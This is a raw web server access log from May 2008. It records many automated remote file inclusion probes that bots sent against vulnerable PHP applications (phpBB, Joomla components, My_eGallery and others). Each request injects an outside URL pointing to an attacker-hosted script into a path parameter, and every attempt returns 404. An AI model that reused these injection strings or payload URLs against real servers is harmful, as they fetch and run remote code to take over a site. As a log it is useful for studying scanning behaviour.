72.32.68.172 - - [04/May/2008:18:26:12 -0600] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:26:12 -0600] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
208.101.26.99 - - [04/May/2008:18:26:15 -0600] "GET /logs/access_log.20080420//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
208.101.26.99 - - [04/May/2008:18:26:19 -0600] "GET /logs/access_log.20080420//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
72.32.68.172 - - [04/May/2008:18:26:22 -0600] "GET /logs/error_log.20080330/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:27:25 -0600] "GET /logs/error_log.20080330/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
66.219.101.32 - - [04/May/2008:18:28:52 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
66.219.101.32 - - [04/May/2008:18:28:52 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
66.219.101.32 - - [04/May/2008:18:28:52 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
208.116.44.60 - - [04/May/2008:18:28:54 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
208.116.44.60 - - [04/May/2008:18:28:54 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.811"
208.116.44.60 - - [04/May/2008:18:28:54 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
216.6.180.69 - - [04/May/2008:18:29:03 -0600] "GET /logs/access_log.20080413/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:29:03 -0600] "GET /index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:29:03 -0600] "GET /logs/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
201.12.151.34 - - [04/May/2008:18:29:12 -0600] "GET /logs/access_log.20080330/admincp/auth/checklogin.php?cfgProgDir=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 258 "-" "libwww-perl/5.800"
72.32.68.172 - - [04/May/2008:18:30:22 -0600] "GET /logs/access_log.20080427/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:31:04 -0600] "GET /logs/access_log/index.php?lang=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:31:04 -0600] "GET /index.php?lang=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:31:04 -0600] "GET /logs/index.php?lang=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:31:15 -0600] "GET /logs/error_log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:31:16 -0600] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:31:16 -0600] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
66.219.101.32 - - [04/May/2008:18:31:35 -0600] "GET /logs/access_log.20080420//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
208.116.44.60 - - [04/May/2008:18:31:36 -0600] "GET /logs/access_log.20080420//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
213.203.209.2 - - [04/May/2008:18:34:37 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
213.203.209.2 - - [04/May/2008:18:34:38 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
213.203.209.2 - - [04/May/2008:18:34:38 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
72.32.68.172 - - [04/May/2008:18:34:52 -0600] "GET /logs/access_log.20080427//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:34:52 -0600] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:34:52 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:35:03 -0600] "GET /logs/access_log.20080427/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
67.195.37.183 - - [04/May/2008:18:35:15 -0600] "GET /logs/access_log HTTP/1.0" 200 32310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.32.68.172 - - [04/May/2008:18:35:22 -0600] "GET /logs/access_log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
64.207.204.13 - - [04/May/2008:18:35:23 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
64.207.204.13 - - [04/May/2008:18:35:25 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
64.207.204.13 - - [04/May/2008:18:35:25 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:35:34 -0600] "GET /logs/access_log/index.php?lang=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:35:34 -0600] "GET /index.php?lang=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:35:34 -0600] "GET /logs/index.php?lang=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
64.38.19.130 - - [04/May/2008:18:36:56 -0600] "GET /logs/error_log.20080420//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.811"
64.38.19.130 - - [04/May/2008:18:36:57 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.811"
64.207.204.13 - - [04/May/2008:18:39:49 -0600] "GET /logs/access_log.20080420//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
82.210.31.3 - - [04/May/2008:18:40:04 -0600] "GET /logs/access_log.20080413/index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
82.210.31.3 - - [04/May/2008:18:40:04 -0600] "GET /index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
82.210.31.3 - - [04/May/2008:18:40:05 -0600] "GET /logs/index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
66.225.229.167 - - [04/May/2008:18:40:23 -0600] "GET /squirrelcart//modules/My_eGallery/public/uploadFile.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
64.38.19.130 - - [04/May/2008:18:40:42 -0600] "GET /logs/access_log.20080420//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.811"
70.86.76.34 - - [04/May/2008:18:40:55 -0600] "GET /logs/access_log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
70.86.76.34 - - [04/May/2008:18:40:55 -0600] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
70.86.76.34 - - [04/May/2008:18:40:55 -0600] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
216.6.180.69 - - [04/May/2008:18:41:43 -0600] "GET /logs/access_log.20080427//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:41:43 -0600] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:41:43 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
217.16.16.208 - - [04/May/2008:18:41:47 -0600] "GET /logs/access_log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
217.16.16.208 - - [04/May/2008:18:41:47 -0600] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
217.16.16.208 - - [04/May/2008:18:41:47 -0600] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
217.16.16.208 - - [04/May/2008:18:41:51 -0600] "GET /logs/access_log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
217.16.16.208 - - [04/May/2008:18:41:51 -0600] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
217.16.16.208 - - [04/May/2008:18:41:51 -0600] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
70.86.76.34 - - [04/May/2008:18:41:59 -0600] "GET /logs/access_log.20080413/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
72.32.68.172 - - [04/May/2008:18:42:17 -0600] "GET /logs/access_log.20080330//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:42:17 -0600] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:42:17 -0600] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:42:23 -0600] "GET /logs/access_log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:42:23 -0600] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:42:24 -0600] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:42:29 -0600] "GET /logs/access_log.20080420//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
67.15.8.80 - - [04/May/2008:18:42:31 -0600] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
67.15.8.80 - - [04/May/2008:18:42:31 -0600] "GET /logs/errors.php?error=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
82.210.31.3 - - [04/May/2008:18:42:43 -0600] "GET /index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
216.6.180.69 - - [04/May/2008:18:42:47 -0600] "GET /logs/access_log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
217.16.16.208 - - [04/May/2008:18:42:55 -0600] "GET /logs/access_log.20080413/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.803"
216.6.180.69 - - [04/May/2008:18:43:00 -0600] "GET /logs/access_log.20080330//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:43:00 -0600] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:43:00 -0600] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
72.32.68.172 - - [04/May/2008:18:43:15 -0600] "GET /logs/access_log.20080413//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:43:34 -0600] "GET /logs/access_log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:43:34 -0600] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:43:34 -0600] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
216.6.180.69 - - [04/May/2008:18:43:45 -0600] "GET /logs/access_log.20080420//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
213.149.32.24 - - [04/May/2008:18:44:17 -0600] "GET /logs/error_log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:18:44:18 -0600] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:18:44:18 -0600] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
217.148.95.154 - - [04/May/2008:18:45:07 -0600] "GET /logs/access_log.20080413/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.76"
217.148.95.154 - - [04/May/2008:18:45:07 -0600] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.76"
217.148.95.154 - - [04/May/2008:18:45:08 -0600] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.76"
217.148.95.154 - - [04/May/2008:18:46:08 -0600] "GET /logs/access_log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.76"
216.6.180.69 - - [04/May/2008:18:46:11 -0600] "GET /logs/access_log.20080413//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
213.203.209.2 - - [04/May/2008:18:46:40 -0600] "GET /logs/access_log.20080413//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:18:48:33 -0600] "GET /logs/access_log.20080427//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
66.225.229.167 - - [04/May/2008:18:50:29 -0600] "GET /logs/access_log.20080420/squirrelcart//modules/My_eGallery/public/uploadFile.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 286 "-" "libwww-perl/5.811"
66.225.229.167 - - [04/May/2008:18:50:29 -0600] "GET /logs/squirrelcart//modules/My_eGallery/public/uploadFile.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
66.225.229.167 - - [04/May/2008:18:51:28 -0600] "GET /logs/error_log.20080330/squirrelcart//modules/My_eGallery/public/uploadFile.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 285 "-" "libwww-perl/5.811"
208.116.44.60 - - [04/May/2008:18:51:38 -0600] "GET /logs/access_log/playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
208.116.44.60 - - [04/May/2008:18:51:38 -0600] "GET /playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
208.116.44.60 - - [04/May/2008:18:51:38 -0600] "GET /logs/playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
80.254.178.186 - - [04/May/2008:18:52:17 -0600] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
208.116.44.60 - - [04/May/2008:18:55:46 -0600] "GET /logs/access_log.20080427/playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
211.172.232.90 - - [04/May/2008:18:56:23 -0600] "GET /logs/access_log.20080420//modules/My_eGallery/public/displayCategory.php?basepath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.811"
208.116.44.60 - - [04/May/2008:18:57:20 -0600] "GET /logs/access_log.20080413//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
208.116.44.60 - - [04/May/2008:18:57:20 -0600] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
208.116.44.60 - - [04/May/2008:18:57:20 -0600] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.811"
201.12.151.34 - - [04/May/2008:19:00:29 -0600] "GET /logs/error_log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 270 "-" "libwww-perl/5.800"
201.12.151.34 - - [04/May/2008:19:00:29 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 255 "-" "libwww-perl/5.800"
201.12.151.34 - - [04/May/2008:19:00:30 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 260 "-" "libwww-perl/5.800"
201.12.151.34 - - [04/May/2008:19:00:30 -0600] "GET /logs/error_log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 271 "-" "libwww-perl/5.800"
201.12.151.34 - - [04/May/2008:19:00:30 -0600] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 256 "-" "libwww-perl/5.800"
201.12.151.34 - - [04/May/2008:19:00:31 -0600] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 261 "-" "libwww-perl/5.800"
200.160.251.134 - - [04/May/2008:19:00:36 -0600] "GET /logs/error_log/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
200.160.251.134 - - [04/May/2008:19:00:42 -0600] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.160.251.134 - - [04/May/2008:19:00:42 -0600] "GET /logs/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
67.15.205.17 - - [04/May/2008:19:01:27 -0600] "GET /logs/error_log/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.811"
67.15.205.17 - - [04/May/2008:19:01:28 -0600] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
67.15.205.17 - - [04/May/2008:19:01:28 -0600] "GET /logs/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
201.12.151.34 - - [04/May/2008:19:01:57 -0600] "GET /logs/access_log.20080427/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 280 "-" "libwww-perl/5.800"
